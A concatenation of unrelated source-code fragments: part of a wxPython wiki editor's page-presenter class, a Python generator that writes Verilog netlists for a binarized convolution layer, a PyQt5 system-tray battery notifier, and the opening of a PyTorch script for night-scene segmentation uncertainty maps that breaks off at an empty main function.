        maxLen = self.getConfig().getint("main", "tabs_maxCharacters", 0)
        if maxLen > 0 and len(shortTitle) > maxLen:
            shortTitle = shortTitle[:(maxLen//2)] + u"..." + \
                    shortTitle[-((maxLen+1)//2):]
        self.fireMiscEventProps({"changed presenter title": True,
                "title": shortTitle})

    def miscEventHappened(self, miscevt):
        """Refresh the title on option changes; otherwise delegate to base class."""
        if miscevt.getSource() is wx.GetApp():
            # The option "tabs_maxCharacters" may be changed, so set title again
            if miscevt.has_key("options changed"):
                self.setTitle(self.shortTitle)
            return
        return BasicDocPagePresenter.miscEventHappened(self, miscevt)

    def fillDefaultSubControls(self):
        """Create and register the default "textedit" and "preview" subcontrols."""
        self.setLayerVisible(False)
        self.Hide()
        editor = self.getMainControl().createWindow({"name": "txteditor1",
                "presenter": self}, self)
        editor.setLayerVisible(False, "textedit")
        self.setSubControl("textedit", editor)
        htmlView = createWikiHtmlView(self, self, -1)
        htmlView.setLayerVisible(False, "preview")
        self.setSubControl("preview", htmlView)
        self.switchSubControl("textedit")

    def getAUITabCtrl(self):
        """Return the AUI tab control containing this presenter."""
        return self.getMainControl().mainAreaPanel.getTabCtrlByPresenter(self)

    def getAUITabPage(self):
        """Return the AUI page info object for this presenter's tab."""
        pIndex = self.getMainControl().mainAreaPanel.getIndexForPresenter(self)
        return self.getMainControl().mainAreaPanel.GetPageInfo(pIndex)
        #tabCtrl = self.getAUITabCtrl()
        #return tabCtrl.GetPage(tabCtrl.GetActivePageIdx())

    def setTabTitleColour(self, colour):
        """Set the text colour of this presenter's tab label."""
        self.getAUITabPage().text_colour = colour
        self.getAUITabCtrl().Refresh()

    def setTabProgressThreadSafe(self, percent, thread, colour=wx.GREEN):
        """Thread-safe wrapper around setTabProgress (runs it on the GUI thread)."""
        try:
            # Only forward the update if the calling thread is still valid.
            thread.testValidThread()
            wx.CallAfter(self.setTabProgress, percent, thread, colour)
        except NotCurrentThreadException:
            return

    def onProgressBarClicked(self, evt):
        """Activate the tab whose progress bar was clicked."""
        # Activate tab that is clicked on
        self.getMainControl().mainAreaPanel.showPresenter(self)

    def onProgressBarContext(self, evt):
        """Show the tab context menu when the progress bar is right-clicked."""
        self.getMainControl().mainAreaPanel.OnTabContextMenu(evt, self)

    def setTabProgress(self, percent, thread="page", colour=None):
        """Update the in-tab progress gauge for *thread*; 0 starts, 100 finishes.

        NOTE(review): indentation of this method was reconstructed from a
        whitespace-mangled source -- verify control flow against upstream.
        """
        try:
            if thread in self.tabProgressCount:
                # Keep the colour the thread registered with at percent == 0.
                colour = self.tabProgressCount[thread][0]
            if percent == 0:
                self.tabProgressCount[thread] = (colour, percent)
            else:
                if thread not in self.tabProgressCount:
                    return
            if percent == 100:
                del self.tabProgressCount[thread]
            if self.getAUITabCtrl() is None:
                return
            if self.tabProgressBar is None:
                self.tabProgressBar = PG.PyGauge(self.getAUITabCtrl(), -1, size=(40, 15), style=wx.GA_HORIZONTAL)
                # Use EVT_CHILD_FOCUS to detect when the progress bar is
                # clicked on as no click event seems to be emitted
                self.tabProgressBar.Bind(wx.EVT_CHILD_FOCUS,
                        self.onProgressBarClicked)
                self.tabProgressBar.Bind(wx.EVT_CONTEXT_MENU,
                        self.onProgressBarContext)
            if percent == 100:
                if len(self.tabProgressCount) < 1:
                    # Last active thread finished: hide the gauge entirely.
                    self.tabProgressBar.Hide()
                    self.getAUITabPage().control = None
                    self.getAUITabCtrl().Refresh()
                    return
                else:
                    # Other threads still running: display one of them instead.
                    for thread in self.tabProgressCount:
                        colour, percent = self.tabProgressCount[thread]
                        break
            if self.getAUITabPage().control is None:
                self.getAUITabPage().control = self.tabProgressBar
            self.tabProgressBar.SetValue(percent)
            self.tabProgressBar.SetBarColour(colour)
            self.tabProgressBar.SetBorderColour(wx.BLACK)
            self.getAUITabCtrl().Refresh()
        except wx.PyDeadObjectError:
            # The tab control may already be destroyed during shutdown.
            pass

    # ----- Implementation of StorablePerspective methods -----

    @staticmethod
    def getPerspectiveType():
        """Return the perspective type tag used for persistence."""
        return u"DocPagePresenter"

    def getStoredPerspective(self):
        """Serialize this presenter as "<subcontrol>|<unified page name>"."""
        unifName = self.getUnifiedPageName()
        if unifName is None:
            return None
        return escapeForIni(self.getCurrentSubControlName(), u"|") + u"|" + \
                escapeForIni(unifName, u"|")

    # def setByStoredPerspective(self, perspectType, data, typeFactory):
    #     raise NotImplementedError

    def deleteForNewPerspective(self):
        """Close this presenter before it is replaced by a restored perspective."""
        self.close()
        StorablePerspective.deleteForNewPerspective(self)

    @staticmethod
    def createFromPerspective(mainControl, parent, perspectType, wndPerspective,
            typeFactory):
        """
        Not part of StorablePerspective, called by the type factory
        """
        # if more parts are available after a second '|' they are ignored
        subControl, unifName = wndPerspective.split(u"|", 2)[:2]
        # unescape
        subControl = unescapeForIni(subControl)
        unifName = unescapeForIni(unifName)
        wnd = DocPagePresenter(parent, mainControl)
        wnd.fillDefaultSubControls()
        wnd.openDocPage(unifName)
        wnd.switchSubControl(subControl)
        return wnd
|
'''
it is design to all layer pass
'''
import numpy as np
import os
import shutil
def set_dir(filepath, file):
    """Ensure directory *filepath* exists and create/empty *file* inside it.

    Args:
        filepath: Target directory (created if missing, parents included).
        file: File name to create; truncated to empty if it already exists.

    Returns:
        str: The path "<filepath>/<file>" of the (now empty) file.
    """
    # makedirs(exist_ok=True) is race-free and also creates missing parent
    # directories, unlike the original exists()+mkdir() pair.
    os.makedirs(filepath, exist_ok=True)
    path = str(filepath) + '/' + str(file)
    # Mode 'w' already truncates on open, so the original explicit
    # seek(0)/truncate() calls were redundant.
    with open(path, 'w'):
        pass
    return path
def int2str(a):
    """Map a digit value to its hex-style letter for values above 9.

    Values 0-9 pass through unchanged (still ints); 10 -> 'A', 11 -> 'B', ...
    """
    # chr(10 + 55) == 'A', mirroring hexadecimal digit naming.
    return chr(a + 55) if a > 9 else a
def dump_unit_layer3(filename, layer_idx, input_fm, weights, pre_pad_stride, pad_stride, next_pad_stride, max_stride):
    """Append the Verilog netlist text for one convolution layer to *filename*.

    Emits, in order: wires for the next layer's activation points (section 2),
    wires for this layer's weights (3), per-channel partial-sum wires (4),
    accumulated-sum `C...` and activation `A...` wires (5/6), DFF instances
    holding the weight reset values (7/8), one `ninexnine_unit` instance per
    3x3 dot product plus the `assign` statements combining partial sums, and
    — when ``max_stride == 2`` — one `maxpool` instance per output point (9).

    Args:
        filename: Verilog file to append to (opened in 'a' mode repeatedly).
        layer_idx: index of the layer being dumped (0-4), embedded in wire names.
        input_fm: input feature map; the leading batch dim is squeezed away.
        weights: weight tensor of shape (out_c, in_c, kh, kw).
        pre_pad_stride: padding already present in ``input_fm`` (subtracted
            from H/W to recover the unpadded spatial size).
        pad_stride: padding applied before the convolution (layers > 0 pad
            with ones, not zeros).
        next_pad_stride: 1 if the NEXT layer expects padded coordinates
            (shifts the emitted point indices by one).
        max_stride: max-pooling stride; 2 enables the maxpool dump.
    """
    # no-op self-assignment kept from the original
    layer_idx = layer_idx
    # Expected input sizes per layer:
    # 0: 1*3*30*30 -> 3*30*30
    # 1: 1*4*14*14
    # 2: 1*8*7*7
    # 3: 1*16*5*5
    # 4: 1*32*3*3
    input_fm = input_fm.squeeze()  # 1*4*14*14 -> 4*14*14
    input_fm_c = input_fm.shape[0]  # 4
    input_fm_h = input_fm.shape[1]  # 14
    input_fm_w = input_fm.shape[2]  # 14
    if pre_pad_stride:
        # recover the unpadded spatial size
        input_fm_h = input_fm.shape[1] - pre_pad_stride * 2
        input_fm_w = input_fm.shape[2] - pre_pad_stride * 2
    if layer_idx == 0:
        input_fm = input_fm
    else:
        if pad_stride:
            # NOTE(review): pads with ONES, not zeros — presumably because the
            # activations are binarized to {0,1}; confirm this is intended.
            input_fm = np.pad(input_fm, ((0, 0), (1, 1), (1, 1)), 'constant', constant_values=(1, 1))  # if true 4*16*16
    weights_c = weights.shape[1]  # 4 (8,4,3,3)
    weights_h = weights.shape[2]  # 3
    weights_w = weights.shape[3]  # 3
    # after conv
    # NOTE(review): both sizes below use weights_h; harmless for square 3x3
    # kernels but wrong for non-square ones — confirm kernels are always square.
    input_fm_h_ = int((input_fm_h - weights_h + 2 * pad_stride) / 1 + 1)  # 14
    input_fm_w_ = int((input_fm_w - weights_h + 2 * pad_stride) / 1 + 1)  # 14
    # final size
    out_fm_c = weights.shape[0]  # 8
    print("only when layer_idx = 0, 1 pad_stride = 1!")
    conv_fm_h = int((input_fm_h - weights_h + 2 * pad_stride) / 1 + 1)  # 14
    conv_fm_w = conv_fm_h  # 14
    if max_stride == 2:
        conv_fm_h = int(conv_fm_h / max_stride)  # 7
        conv_fm_w = int(conv_fm_w / max_stride)  # 7
    # 1. dump layer_idx wire Point num = 16*16*4 = 1024************************************************
    # wire P1000,P1010,P1020,P1100,P0110,P0120,P0200,P0210,P0220;
    # with open (filename, 'a') as f:
    #     P_unit_list = []
    #     for j in range(input_fm_c):  # 4
    #         for k in range(input_fm.shape[1]):  # 16
    #             for l in range(input_fm.shape[2]):  # 16
    #                 P_unit_idx = "P" + str(layer_idx) + str(int2str(k)) + str(int2str(l)) + str(int2str(j))
    #                 if k == 0 or l == 0:
    #                     f.write("wire " + str(P_unit_idx) + ";\n")
    #     f.close()
    # 2. dump layer_idx + 1 wire Point num = 7*7*8 = 392************************************************
    # due to next_pad_stride = 0, so first point = k
    # due to next_pad_stride = 1, so first point = k + 1
    # wire P1000;
    i = 0
    for j in range(out_fm_c):  # 8
        for k in range(conv_fm_h):  # 7
            if next_pad_stride == 1:
                k = k + 1
            for l in range(conv_fm_w):  # 7
                if next_pad_stride == 1:
                    l = l + 1
                out_P_unit_num_0 = "P" + \
                    str(layer_idx + 1) + \
                    str(int2str(k)) + \
                    str(int2str(l)) + \
                    str(int2str(j))
                with open (filename, 'a') as f:
                    f.write("(*DONT_TOUCH=\"true\"*) wire " + str(out_P_unit_num_0) + ";\n")
                    i += 1
                f.close()
    if i == (out_fm_c * conv_fm_h * conv_fm_w):
        print("2. Dump pass!")
    else:
        print("2. Dump layer_idx + 1 wire P1000; false!")
    # 3. dump layer_idx wire Weihts num = 8*4*3*3 = 288 ************************************************
    # e.g. wire W00000,W00010,W00020,W00100,W00110,W00120,W00200,W00210,W00220;
    i = 0
    W_unit = []
    for j in range(out_fm_c):  # 8
        for k in range(input_fm_c):  # 4
            for l in range(weights_h):  # 3
                for m in range(weights_w):  # 3
                    W_unit_idx = "W" + \
                        str(layer_idx) + \
                        str(int2str(j)) + \
                        str(int2str(l)) + \
                        str(int2str(m)) + \
                        str(int2str(k))
                    W_unit.append(W_unit_idx)
                    i += 1
            # one write per (j, k): W_unit now holds the 9 names of a 3x3 kernel
            with open (filename, 'a') as f:
                f.write("(*DONT_TOUCH=\"true\"*) wire " + str(W_unit[0]) + "," + str(W_unit[1]) + "," + str(W_unit[2]) + ","
                        + str(W_unit[3]) + "," + str(W_unit[4]) + "," + str(W_unit[5]) + ","
                        + str(W_unit[6]) + "," + str(W_unit[7]) + "," + str(W_unit[8])
                        + ";\n")
                W_unit.clear()
            f.close()
    if i == (out_fm_c * input_fm_c * weights_h * weights_w):
        print("3. Dump pass!")
    else:
        print("3. Dump wire W00000,W00010,W00020,W00100,W00110,W00120,W00200,W00210,W00220; false")
    # 4. dump c00000 num 4*28*28 = 3136 -> 8*14*14 ************************************************
    # wire [3:0]c00000,c01000,c02000;
    c_unit = []
    m = 0
    with open (filename, 'a') as f:
        for i in range(out_fm_c):  # 8
            for k in range(input_fm_h_):  # 14
                for l in range(input_fm_w_):  # 14
                    f.write("(*DONT_TOUCH=\"true\"*) wire " + "signed [4:0] ")
                    for j in range(input_fm_c):  # 4
                        c_unit_idx = 'c' + \
                            str(layer_idx) + \
                            str(int2str(j)) + \
                            str(int2str(k)) + \
                            str(int2str(l)) + \
                            str(int2str(i))
                        c_unit.append(c_unit_idx)
                        if j == (input_fm_c - 1):
                            f.write(c_unit[0] + ";\n")
                        else:
                            f.write(c_unit[0] + ",")
                        c_unit.clear()
                        m += 1
    f.close()
    if m == (out_fm_c * input_fm_h_ * input_fm_w_ * input_fm_c):
        print("4. Dump pass!")
    else:
        print("4. Dump wire signed [3:0] c00000,c01000,c02000; false")
    # 5. dump C0000 num = 4 * 14 * 14 = 784 -> 8*7*7 = 392
    # 6. dump A0000 == C0000
    # wire [5:0]C0000,C0010,C0100,C0110;
    j = 0
    # bit-width of the signed accumulator wire ("signed [number:0]"), per layer
    if layer_idx == 0:
        number = 6
    if layer_idx == 1:
        number = 6
    if layer_idx == 2:
        number = 7
    if layer_idx == 3:
        number = 8
    if layer_idx == 4:
        number = 9
    with open (filename, 'a') as f:
        for i in range(out_fm_c):  # 8
            for k in range(input_fm_h_):  # 14
                for l in range(input_fm_w_):  # 14
                    C_unit_0 = "C" + \
                        str(layer_idx) + \
                        str(int2str(k)) + \
                        str(int2str(l)) + \
                        str(int2str(i))
                    A_unit_0 = "A" + \
                        str(layer_idx) + \
                        str(int2str(k)) + \
                        str(int2str(l)) + \
                        str(int2str(i))
                    f.write("(*DONT_TOUCH=\"true\"*) wire " + "signed [" + str(number) +":0] " + str(C_unit_0) + ";\n")
                    f.write("(*DONT_TOUCH=\"true\"*) wire " + str(A_unit_0) +";\n")
                    j += 1
    f.close()
    if j == (out_fm_c * input_fm_h_ * input_fm_w_):
        print("5. Dump pass!")
        print("6. Dump pass!")
    else:
        print("5. Dump wire signed [5:0] C0000,C0010,C0100,C0110; false")
        print("6. Dump wire A0000,A0010,A0100,A0110; false")
    # 7. dump DFF_save_fm DFF_P0(.clk(clk),.rstn(rstn),.reset_value(0),.q(P0000));
    # num = 30*30*3 = 2700
    # 8. dump DFF_save_fm DFF_W0(.clk(clk),.rstn(rstn),.reset_value(0),.q(W00000));
    # num = 4*3*3*3 = 108 - 8*4*3*3
    weight_dict = {}
    i = 0
    weights_list = []
    for j in range(out_fm_c):  # 8
        for k in range(weights_c):  # 4
            for l in range(weights_h):  # 3
                for m in range(weights_w):  # 3
                    temp = 'W' + \
                        str(layer_idx) + \
                        str(int2str(j)) + \
                        str(int2str(l)) + \
                        str(int2str(m)) + \
                        str(int2str(k))
                    weights_list.append(temp)
                    # NOTE(review): np.int is deprecated (removed in NumPy >= 1.24);
                    # consider .astype(int) when next touching this code.
                    value_temp = weights.flat[i].astype(np.int)
                    # weights of -1 are stored as reset value 0
                    if value_temp == -1:
                        value_temp = 0
                        weight_dict[weights_list[i]] = value_temp
                    else:
                        weight_dict[weights_list[i]] = value_temp
                    i += 1
    with open (filename, 'a') as f:
        # DFF instance numbering starts at 1440 — presumably continuing a
        # count from earlier layers; TODO confirm against the other dumpers.
        i = 1440
        for key, value in weight_dict.items():
            dff_weights_idx = i
            reset_value_w = value
            weights_list = key
            f.write("DFF_save_fm DFF_W" + \
                str(dff_weights_idx) + \
                "(.clk(clk),.rstn(rstn),.reset_value(" + \
                str(value) + "),.q(" + \
                str(key) + "));\n")
            i += 1
    f.close()
    # 9. dump ninexnine_unit, num = 4*3*28*28
    with open (filename, 'a') as f:
        # instance numbering starts at 9472 — presumably continues a count
        # from earlier layers; TODO confirm against the other dumpers.
        h = 9472
        # g = 0
        c_idx_list = []
        # print('Warning, when dump ninexnine_unit, ' +
        #       'if input_fm_c != 3, than need to add c_idx_list[2]')
        # save Point_unit_idx
        for i in range(out_fm_c):  # 8
            for j in range(input_fm_h_):  # 14
                for k in range(input_fm_w_):  # 14
                    for l in range(input_fm_c):  # 3
                        P_idx_0 = "P" + str(layer_idx) + str(int2str(j + 0)) + str(int2str(k + 0)) + str(int2str(l))
                        P_idx_1 = "P" + str(layer_idx) + str(int2str(j + 0)) + str(int2str(k + 1)) + str(int2str(l))
                        P_idx_2 = "P" + str(layer_idx) + str(int2str(j + 0)) + str(int2str(k + 2)) + str(int2str(l))
                        P_idx_3 = "P" + str(layer_idx) + str(int2str(j + 1)) + str(int2str(k + 0)) + str(int2str(l))
                        P_idx_4 = "P" + str(layer_idx) + str(int2str(j + 1)) + str(int2str(k + 1)) + str(int2str(l))
                        P_idx_5 = "P" + str(layer_idx) + str(int2str(j + 1)) + str(int2str(k + 2)) + str(int2str(l))
                        P_idx_6 = "P" + str(layer_idx) + str(int2str(j + 2)) + str(int2str(k + 0)) + str(int2str(l))
                        P_idx_7 = "P" + str(layer_idx) + str(int2str(j + 2)) + str(int2str(k + 1)) + str(int2str(l))
                        P_idx_8 = "P" + str(layer_idx) + str(int2str(j + 2)) + str(int2str(k + 2)) + str(int2str(l))
                        W_idx_0 = "W" + str(layer_idx) + str(int2str(i)) + str(0) + str(0) + str(int2str(l))
                        W_idx_1 = "W" + str(layer_idx) + str(int2str(i)) + str(0) + str(1) + str(int2str(l))
                        W_idx_2 = "W" + str(layer_idx) + str(int2str(i)) + str(0) + str(2) + str(int2str(l))
                        W_idx_3 = "W" + str(layer_idx) + str(int2str(i)) + str(1) + str(0) + str(int2str(l))
                        W_idx_4 = "W" + str(layer_idx) + str(int2str(i)) + str(1) + str(1) + str(int2str(l))
                        W_idx_5 = "W" + str(layer_idx) + str(int2str(i)) + str(1) + str(2) + str(int2str(l))
                        W_idx_6 = "W" + str(layer_idx) + str(int2str(i)) + str(2) + str(0) + str(int2str(l))
                        W_idx_7 = "W" + str(layer_idx) + str(int2str(i)) + str(2) + str(1) + str(int2str(l))
                        W_idx_8 = "W" + str(layer_idx) + str(int2str(i)) + str(2) + str(2) + str(int2str(l))
                        c_idx = "c" + str(layer_idx) + \
                            str(int2str(l)) + \
                            str(int2str(j)) + \
                            str(int2str(k)) + \
                            str(int2str(i))
                        c_idx_list.append(c_idx)
                        f.write("ninexnine_unit ninexnine_unit_" +
                                str(h) + "(\n\t\t\t\t" +
                                ".clk(clk),\n" +
                                "\t\t\t\t.rstn(rstn),\n" +
                                "\t\t\t\t.a0(" + str(P_idx_0) + "),\n" +
                                "\t\t\t\t.a1(" + str(P_idx_1) + "),\n" +
                                "\t\t\t\t.a2(" + str(P_idx_2) + "),\n" +
                                "\t\t\t\t.a3(" + str(P_idx_3) + "),\n" +
                                "\t\t\t\t.a4(" + str(P_idx_4) + "),\n" +
                                "\t\t\t\t.a5(" + str(P_idx_5) + "),\n" +
                                "\t\t\t\t.a6(" + str(P_idx_6) + "),\n" +
                                "\t\t\t\t.a7(" + str(P_idx_7) + "),\n" +
                                "\t\t\t\t.a8(" + str(P_idx_8) + "),\n" +
                                "\t\t\t\t.b0(" + str(W_idx_0) + "),\n" +
                                "\t\t\t\t.b1(" + str(W_idx_1) + "),\n" +
                                "\t\t\t\t.b2(" + str(W_idx_2) + "),\n" +
                                "\t\t\t\t.b3(" + str(W_idx_3) + "),\n" +
                                "\t\t\t\t.b4(" + str(W_idx_4) + "),\n" +
                                "\t\t\t\t.b5(" + str(W_idx_5) + "),\n" +
                                "\t\t\t\t.b6(" + str(W_idx_6) + "),\n" +
                                "\t\t\t\t.b7(" + str(W_idx_7) + "),\n" +
                                "\t\t\t\t.b8(" + str(W_idx_8) + "),\n" +
                                "\t\t\t\t.c(" +
                                str(c_idx) +
                                ")\n" +
                                ");\n\n")
                        h += 1
                    # assign C0000=c00000+c01000+c02000;
                    C_idx = "C" + str(layer_idx) + \
                        str(int2str(j)) + \
                        str(int2str(k)) + \
                        str(int2str(i))
                    A_idx = "A" + str(layer_idx) + \
                        str(int2str(j)) + \
                        str(int2str(k)) + \
                        str(int2str(i))
                    f.write("assign " + str(C_idx) + "=")
                    for m in range(input_fm_c):
                        if m == input_fm_c - 1:
                            f.write(str(c_idx_list[m]) + ";\n")
                        else:
                            f.write(str(c_idx_list[m]) + "+")
                    c_idx_list.clear()
                    # assign A0000=(C0000>=0)?1:0;
                    f.write("assign " +
                            str(A_idx) +
                            "=" + "(" +
                            str(C_idx) + ">=0)?1:0;\n\n")
                    if max_stride != 2:
                        P_idx = "P" + str(layer_idx + 1) + \
                            str(int2str(j)) + \
                            str(int2str(k)) + \
                            str(int2str(i))
                        f.write("assign " + str(P_idx) + "=" + str(A_idx) + ";\n\n")
        if max_stride == 2:
            h = 0
            for i in range (out_fm_c):  # 8
                for j in range(conv_fm_h):  # 7
                    for k in range(conv_fm_w):  # 7
                        A_idx_a0 = "A" + str(layer_idx) + str(int2str(j * max_stride)) + str(int2str(k * max_stride)) + str(int2str(i))
                        A_idx_a1 = "A" + str(layer_idx) + str(int2str(j * max_stride)) + str(int2str(k * max_stride + 1)) + str(int2str(i))
                        A_idx_a2 = "A" + str(layer_idx) + str(int2str(j * max_stride + 1)) + str(int2str(k * max_stride)) + str(int2str(i))
                        A_idx_a3 = "A" + str(layer_idx) + str(int2str(j * max_stride + 1)) + str(int2str(k * max_stride + 1)) + str(int2str(i))
                        if next_pad_stride == 1:
                            P_idx = "P" + str(layer_idx + 1) + str(int2str(j + 1)) + str(int2str(k + 1)) + str(int2str(i))
                        else:
                            P_idx = "P" + str(layer_idx + 1) + str(int2str(j)) + str(int2str(k)) + str(int2str(i))
                        f.write("maxpool maxpool_" + str(h) +
                                "(\n\t\t\t\t" +
                                ".clk(clk),\n" +
                                "\t\t\t\t" +
                                ".rstn(rstn),\n" +
                                "\t\t\t\t" +
                                ".a0(" + str(A_idx_a0) + "),\n" +
                                "\t\t\t\t" +
                                ".a1(" + str(A_idx_a1) + "),\n" +
                                "\t\t\t\t" +
                                ".a2(" + str(A_idx_a2) + "),\n" +
                                "\t\t\t\t" +
                                ".a3(" + str(A_idx_a3) + "),\n" +
                                "\t\t\t\t" +
                                ".p(" +str(P_idx) + ")\n" +
                                ");\n\n")
                        h += 1
        # f.write("endmodule")
        f.write("//layer3 done, begain next layer\n")
        print("layer3 done, next layer ctrl F layer3")
    f.close()
# ---------------------------------------------------------------------------
# desktopBatteryNotifier.py (from Muhazerin/desktop-battery-notifier)
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import (QThread, pyqtSignal, pyqtSlot)
from PyQt5.QtWidgets import (QApplication, QDialog, QSystemTrayIcon,
QMenu, QVBoxLayout, QAction, QMessageBox)
from PyQt5.QtSql import (QSqlDatabase, QSqlQuery)
import sys
import psutil
import window
class Worker(QThread):
    """Background thread that polls the battery state every 5 minutes.

    Emits batInfo(percent, power_plugged) on each poll.
    """

    # signal payload: (battery percent, whether AC power is plugged in)
    batInfo = pyqtSignal(int, bool)

    def __init__(self):
        QThread.__init__(self)

    def __del__(self):
        # Block until the thread finishes before the object is destroyed.
        self.wait()

    def run(self):
        while True:
            battery = psutil.sensors_battery()
            # sensors_battery() returns None on systems without a battery;
            # guard to avoid an AttributeError killing the worker thread.
            if battery is not None:
                # percent may be a float, but the signal is declared as int
                self.batInfo.emit(int(battery.percent), battery.power_plugged)
            self.sleep(300)  # let the thread sleep for 5 minutes before continue
class Window(QDialog, window.Ui_Dialog):
    """Settings dialog plus system-tray icon for the battery notifier.

    Shows the upper/lower battery-percentage limits (persisted in SQLite)
    and pops tray notifications when the Worker reports the battery
    crossing either limit.
    """

    def __init__(self):
        super(Window, self).__init__()
        # These 3 functions will also launch a system tray in the background.
        # The app will not close unless the user closes the system tray.
        self.createAction()
        self.createSystemTray()
        self.setSystemTrayIcon()
        self.trayIcon.activated.connect(self.restoreApp)
        self.trayIcon.show()
        # Fallback limits, set BEFORE the worker starts: the original code
        # only assigned these inside the query loop below, so an early worker
        # emit (or a missing/empty database row) crashed on_batInfo_emitted
        # with AttributeError.
        self.originalUpperBatteryPercentageLimit = 80
        self.originalLowerBatteryPercentageLimit = 20
        # Worker thread to check battery life
        self.batteryWorker = Worker()
        self.batteryWorker.batInfo.connect(self.on_batInfo_emitted)
        self.batteryWorker.start()
        self.setupUi(self)
        self.saveBtn.setEnabled(False)
        self.upperBatteryPercentageLimitSpinBox.valueChanged.connect(self.checkOriginal)
        self.lowerBatteryPercentageLimitSpinBox.valueChanged.connect(self.checkOriginal)
        self.saveBtn.clicked.connect(self.saveNewValue)
        # open the database to retrieve the stored limits
        self.db = QSqlDatabase.addDatabase("QSQLITE")
        self.db.setDatabaseName("database/db.sqlite3")
        self.db.open()
        query = QSqlQuery()
        query.exec("SELECT * FROM info LIMIT 1;")
        while query.next():
            self.originalUpperBatteryPercentageLimit = query.value(0)
            self.originalLowerBatteryPercentageLimit = query.value(1)
            self.upperBatteryPercentageLimitSpinBox.setValue(query.value(0))
            self.lowerBatteryPercentageLimitSpinBox.setValue(query.value(1))
        self.db.close()  # close the connection after using it

    def saveNewValue(self):
        """Validate the spin-box limits and persist them to the database."""
        if self.upperBatteryPercentageLimitSpinBox.value() > self.lowerBatteryPercentageLimitSpinBox.value():
            self.saveBtn.setEnabled(False)
            self.originalUpperBatteryPercentageLimit = self.upperBatteryPercentageLimitSpinBox.value()
            self.originalLowerBatteryPercentageLimit = self.lowerBatteryPercentageLimitSpinBox.value()
            self.db.open()
            query = QSqlQuery()
            # values come from integer spin boxes, so interpolation is safe here
            statement = f"UPDATE info SET upperBatLimit={self.originalUpperBatteryPercentageLimit}, lowerBatLimit={self.originalLowerBatteryPercentageLimit};"
            query.exec(statement)
            self.db.close()
        elif self.upperBatteryPercentageLimitSpinBox.value() == self.lowerBatteryPercentageLimitSpinBox.value():
            QMessageBox.critical(None, "Error", "The upper battery limit cannot be equal to the lower battery limit")
        else:
            QMessageBox.critical(None, "Error", "The upper battery limit cannot be lower than the lower battery limit")

    def checkOriginal(self, placeholder):
        """Enable Save only when a spin box differs from the stored limits."""
        if self.originalUpperBatteryPercentageLimit == self.upperBatteryPercentageLimitSpinBox.value() and self.originalLowerBatteryPercentageLimit == self.lowerBatteryPercentageLimitSpinBox.value():
            self.saveBtn.setEnabled(False)
        else:
            self.saveBtn.setEnabled(True)

    @pyqtSlot(int, bool)
    def on_batInfo_emitted(self, batPercent, powerPlugged):
        """Show a tray notification when the battery crosses a limit."""
        if powerPlugged and batPercent >= self.originalUpperBatteryPercentageLimit:
            self.trayIcon.showMessage("Battery Notifier",
                                      f"Battery is at {batPercent}%. Unplug your power",
                                      self.icon, 2000)
        elif not powerPlugged and batPercent <= self.originalLowerBatteryPercentageLimit:
            self.trayIcon.showMessage("Battery Notifier",
                                      f"Battery is at {batPercent}%. Please plug in your power",
                                      self.icon, 2000)

    def setSystemTrayIcon(self):
        """Assign the battery icon to the tray; kept on self for notifications."""
        self.icon = QIcon(":/battery.png")
        self.trayIcon.setIcon(QIcon(":/battery.png"))

    def closeApp(self):
        """Stop the worker thread and quit the application."""
        self.batteryWorker.quit()
        QApplication.instance().quit()

    def restoreApp(self, activationReason):
        """Restore the dialog when the tray icon is double-clicked."""
        # QSystemTrayIcon.DoubleClick == 3 (the original used the bare magic number)
        if activationReason == QSystemTrayIcon.DoubleClick:
            self.showNormal()

    def createAction(self):
        """Create the tray context-menu actions."""
        self.restoreAction = QAction("&Restore", self,
                                     triggered=self.showNormal)
        self.quitAction = QAction("&Quit", self,
                                  triggered=self.closeApp)

    def createSystemTray(self):
        """Build the tray icon and its context menu."""
        self.trayIconMenu = QMenu(self)
        self.trayIconMenu.addAction(self.restoreAction)
        self.trayIconMenu.addSeparator()
        self.trayIconMenu.addAction(self.quitAction)
        self.trayIcon = QSystemTrayIcon(self)
        self.trayIcon.setContextMenu(self.trayIconMenu)
def main():
    """Start the Qt application; the dialog lives on in the system tray."""
    app = QApplication(sys.argv)
    # Closing the settings dialog must not quit the app — it keeps running
    # in the system tray until the user picks Quit.
    QApplication.setQuitOnLastWindowClosed(False)
    # local renamed from `window`, which shadowed the imported `window` module;
    # also removes the stray trailing '|' artifact that broke the syntax here
    dialog = Window()
    dialog.show()
    sys.exit(app.exec_())


if __name__ == "__main__":
    main()
import os
import torch
import numpy as np
from PIL import Image
import torch.nn as nn
from torch.utils import data
from network import *
from dataset.zurich_night_dataset import zurich_night_DataSet
from dataset.acdc_dataset import acdc_dataset
from configs.test_config import get_arguments
import torch.nn.functional as F
from tqdm import tqdm
from torchvision import utils as vutils
# Cityscapes 19-class color palette: one (R, G, B) triple per class id.
palette = [128, 64, 128, 244, 35, 232, 70, 70, 70, 102, 102, 156, 190, 153, 153, 153, 153, 153, 250, 170, 30,
           220, 220, 0, 107, 142, 35, 152, 251, 152, 70, 130, 180, 220, 20, 60, 255, 0, 0, 0, 0, 142, 0, 0, 70,
           0, 60, 100, 0, 80, 100, 0, 0, 230, 119, 11, 32]
# Pad to the full 256 * 3 entries expected by PIL's Image.putpalette.
zero_pad = 256 * 3 - len(palette)
for i in range(zero_pad):
    palette.append(0)
def colorize_mask(mask):
    """Turn a 2-D array of class ids into a palettized ('P'-mode) PIL image."""
    img = Image.fromarray(mask.astype(np.uint8))
    img = img.convert('P')
    img.putpalette(palette)
    return img
def prob_2_entropy(prob):
    """Convert probabilistic prediction maps to weighted self-information maps.

    Expects a 3-D (C, H, W) probability tensor; output is normalized by
    log2(C) so a uniform distribution yields per-element values of 1/C.
    """
    c, h, w = prob.size()  # requires exactly a 3-D (C, H, W) tensor
    weighted_info = torch.mul(prob, torch.log2(prob + 1e-30))
    return -weighted_info / np.log2(c)
def prob_2_vr(prob):
    """Convert probabilistic prediction maps to a variation-ratio map.

    The variation ratio is 1 - max-class-probability per pixel, a simple
    uncertainty measure. (The original docstring was copy-pasted from
    prob_2_entropy and described the wrong quantity.)

    Args:
        prob: 3-D (C, H, W) probability tensor.

    Returns:
        (H, W) tensor of variation ratios in [0, 1 - 1/C].
    """
    c, h, w = prob.size()  # enforce the expected 3-D shape
    # print(prob.shape)
    return 1 - torch.max(prob, dim=0)[0]
def main():
    """Run DANNet (LightNet + segmentation model) inference on the
    Zurich-night test set and save binarized variation-ratio (uncertainty)
    maps as grayscale PNGs to a hard-coded output directory.

    Expects --restore_from / --restore_from_light checkpoints and requires
    a CUDA device (device is hard-coded to "cuda").
    """
